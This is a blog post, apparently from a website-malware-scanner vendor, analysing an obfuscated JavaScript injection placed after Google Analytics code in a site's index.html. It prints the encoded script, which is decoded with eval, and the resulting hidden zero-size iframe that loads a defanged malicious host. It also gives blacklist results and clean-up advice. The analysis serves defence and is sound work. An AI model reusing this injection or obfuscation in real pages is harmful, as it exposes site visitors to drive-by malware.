Obfuscated malicious JavaScript code combined with GA code
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Obfuscated JavaScript comes right after the valid GA code and placed in index.html.
One might assume that the GA code was embedded by attacker as well to monitor his success. However, this might be a simple coincidence. Interestingly, the website is in Google blacklist database. Below you will find payload analysis and threat dump.
For public databases of site scan reports:
For global web malware monitoring statistic and severity levels:
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Thu Nov 28 14:18:42 2013
Infected website's files: 1
Online Website Malware Scanner sitescan overview |
Malware entry
Beautified script
<script>varwsqWQBPps=" cNRoPJdqz3ccNRoPJdqz69cNRoPJdq z66cNRoPJdqz72cNRoPJdqz61cNRoP Jdqz6dcNRoPJdqz65cNRoPJdqz20cN RoPJdqz73cNRoPJdqz72cNRoPJdqz6 3cNRoPJdqz3dcNRoPJdqz22cNRoPJd qz68cNRoPJdqz74cNRoPJdqz74cNRo PJdqz70cNRoPJdqz3acNRoPJdqz2fc NRoPJdqz2fcNRoPJdqz70cNRoPJdqz 72cNRoPJdqz69cNRoPJdqz76cNRoPJ dqz61cNRoPJdqz74cNRoPJdqz65cNR oPJdqz33cNRoPJdqz2ecNRoPJdqz7a cNRoPJdqz61cNRoPJdqz70cNRoPJdq z74cNRoPJdqz6fcNRoPJdqz2ecNRoP Jdqz6fcNRoPJdqz72cNRoPJdqz67cN RoPJdqz2fcNRoPJdqz62cNRoPJdqz6 ccNRoPJdqz6fcNRoPJdqz67cNRoPJd qz2fcNRoPJdqz76cNRoPJdqz6ccNRo PJdqz71cNRoPJdqz73cNRoPJdqz72c NRoPJdqz79cNRoPJdqz79cNRoPJdqz 61cNRoPJdqz63cNRoPJdqz72cNRoPJ dqz2ecNRoPJdqz70cNRoPJdqz68cNR oPJdqz70cNRoPJdqz3fcNRoPJdqz76 cNRoPJdqz61cNRoPJdqz6fcNRoPJdq z77cNRoPJdqz76cNRoPJdqz3dcNRoP Jdqz4ecNRoPJdqz48cNRoPJdqz63cN RoPJdqz43cNRoPJdqz71cNRoPJdqz5 5cNRoPJdqz46cNRoPJdqz53cNRoPJd qz26cNRoPJdqz61cNRoPJdqz6dcNRo PJdqz70cNRoPJdqz3bcNRoPJdqz68c NRoPJdqz72cNRoPJdqz79cNRoPJdqz 74cNRoPJdqz65cNRoPJdqz77cNRoPJ dqz73cNRoPJdqz66cNRoPJdqz64cNR oPJdqz3dcNRoPJdqz39cNRoPJdqz38 cNRoPJdqz38cNRoPJdqz39cNRoPJdq z34cNRoPJdqz33cNRoPJdqz39cNRoP Jdqz26cNRoPJdqz61cNRoPJdqz6dcN RoPJdqz70cNRoPJdqz3bcNRoPJdqz7 9cNRoPJdqz6acNRoPJdqz72cNRoPJd qz65cNRoPJdqz73cNRoPJdqz66cNRo PJdqz64cNRoPJdqz3dcNRoPJdqz38c NRoPJdqz35cNRoPJdqz34cNRoPJdqz 22cNRoPJdqz20cNRoPJdqz6ecNRoPJ dqz61cNRoPJdqz6dcNRoPJdqz65cNR oPJdqz3dcNRoPJdqz22cNRoPJdqz79 cNRoPJdqz66cNRoPJdqz65cNRoPJdq z6acNRoPJdqz43cNRoPJdqz50cNRoP Jdqz43cNRoPJdqz7acNRoPJdqz62cN RoPJdqz41cNRoPJdqz22cNRoPJdqz2 0cNRoPJdqz74cNRoPJdqz69cNRoPJd qz74cNRoPJdqz6ccNRoPJdqz65cNRo PJdqz3dcNRoPJdqz22cNRoPJdqz4ec NRoPJdqz65cNRoPJdqz73cNRoPJdqz 58cNRoPJdqz6fcNRoPJdqz59cNRoPJ dqz47cNRoPJdqz54cNRoPJdqz42cNR oPJdqz7acNRoPJdqz22cNRoPJdqz20 cNRoPJdqz77cNRoPJdqz69cNRoPJdq z64cNRoPJdqz74cNRoPJdqz68cNRoP Jdqz3dcNRoPJdqz22cNRoPJdqz30cN RoPJdqz22cNRoPJdqz20cNRoPJdqz6 8cNRoPJdqz65cNRoPJdqz69cNRoPJd qz67cNRoPJdqz68cNRoPJdqz74cNRo PJdqz3dcNRoPJdqz22cNRoPJdqz30c NRoPJdqz22cNRoPJdqz20cNRoPJdqz 66cNRoPJdqz72cNRoPJdqz61cNRoPJ dqz6dcNRoPJdqz65cNRoPJdqz62cNR oPJdqz6fcNRoPJdqz72cNRoPJdqz64 cNRoPJdqz65cNRoPJdqz72cNRoPJdq z3dcNRoPJdqz22cNRoPJdqz30cNRoP Jdqz22cNRoPJdqz3ecNRoPJdqz3ccN RoPJdqz2fcNRoPJdqz69cNRoPJdqz6 6cNRoPJdqz72cNRoPJdqz61cNRoPJd qz6dcNRoPJdqz65cNRoPJdqz3e";yv DFQwwmM=eval;varWSxQJgvuB=wsqW QBPps.replace(/cNRoPJdqz/g,"%" );]]
Decoded payload generates hidden iframe to http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854Malicious payload
Payload:
<iframe src="http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe>
Blacklisting status
The website is Suspicious on Google Safe Browsing.
VirusTotal URL scan reports 8/51 antivirus and malware detection engines identified the redirect IP as malicious site.
VirusTotal URL scan report screenshot |
Malware clean-up
Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, use Website Anti-malware Monitoring for malware removal.Alternatively, you can try to remove malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removing from blacklist.
No comments:
Post a Comment